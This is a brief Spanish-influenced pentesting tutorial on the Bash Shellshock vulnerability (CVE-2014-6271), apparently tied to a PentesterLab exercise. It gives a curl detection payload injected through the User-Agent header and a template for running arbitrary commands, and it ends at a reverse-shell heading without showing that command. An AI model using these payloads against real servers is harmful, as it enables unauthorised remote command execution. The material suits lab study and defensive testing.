Shellshock.

Shellshock is a security vulnerability in the Bash shell, discovered in 2014, that allows attackers to execute arbitrary commands on a vulnerable system. It exploits the way Bash handles environment variables and functions. By injecting malicious code into these variables, an attacker can gain control of the system, execute commands, or bypass security restrictions, making it a serious risk for servers and devices running vulnerable versions of Bash.

The following examples can be reproduced in the next lab: Pentesterlab CVE-2014-6271/Shellshock

Detection.

Shellshock can be exploited regularly in .sh or .cgi files, we can add those extensions to search them in our fuzzing.

Shellshock payloads allways begin with: () { :;};.

curl.

Once we think we have found this vulnerability we can send the next curl to the server and check if it answers back. If it does we are against a shellshock vulnerability.

curl -H ‘User-Agent: () { :;}; echo; echo ¿Es vulnerable?’ ‘http://10.10.10.56/cgi-bin/user.sh’

We can use Burpsuite too.

RCE.

Once we know are facing Shellshock we can try to excute commands in the target. To de so we will deploy our commands as follows:

User-Agent: () { :;}; /bin/bash -c "<COMMAND>"

ping

wget

Reverse Shell.

Any of the headers of the request can be used to deploy our payload as you can see in the following pictures: